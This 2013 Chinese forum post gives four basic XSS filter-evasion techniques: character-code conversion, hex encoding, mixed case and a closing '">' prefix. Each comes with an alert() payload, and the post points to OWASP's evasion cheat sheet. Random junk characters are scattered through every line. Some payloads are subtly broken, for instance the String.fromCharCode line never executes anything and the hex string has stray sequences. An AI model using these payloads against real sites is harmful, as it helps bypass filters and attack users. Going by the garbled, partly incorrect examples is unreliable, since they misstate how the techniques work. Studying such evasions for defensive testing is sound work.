四种超级基础的绕过方法。+ i6 K1 U8 h: X5 n+ ]
1.转换为ASCII码
: G+ w7 x# P6 G# Y8 {$ s例子:原脚本为<script>alert(‘I love F4ck’)</script >
. O4 b3 J) U3 S5 t g& a通过转换,变成:
' y+ R5 b3 Z8 C7 Y' E<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
3 m, w/ |% a5 e T 1 C4 l1 h. r1 J o2 C, W
2.转换为HEX(十六进制), }1 H3 E% i* \; X3 j
例子:原脚本为<script>alert(‘I love F4ck’)</script>/ Y4 \* d& S; ~7 }
通过转换,变成:
; b% a. R. n5 [8 F, `%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e C7 ?9 q' L% R# o6 o1 Q
. x) b/ V& m5 [0 K! {& P3.转换脚本的大小写
: [% X4 A. n) B" @/ x+ Q例子:原脚本为<script>alert(‘I love F4ck’)</script>8 a. h7 c' h. {0 x! `: Q
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>, M4 O' g! a0 n- j- t3 s5 y
3 _# k6 K& i" K/ m. g% R5 @
4.增加闭合标记”>
7 [$ w! p" l. G% n. r& @例子:原脚本为<script>alert(‘I love F4ck’)</script>
5 l& |& X0 n" h" B# h转换为:”><script>alert(‘I love F4ck’)</script>- h7 u8 [' J" G: k S. S
更详细绕过技术请参考此网页
! Q; ^# |! w* F- H1 I% Lhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
3 `7 r3 g9 L* `: w 8 n8 |$ I8 ]$ {5 {, X: J6 y& D6 e6 ?
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对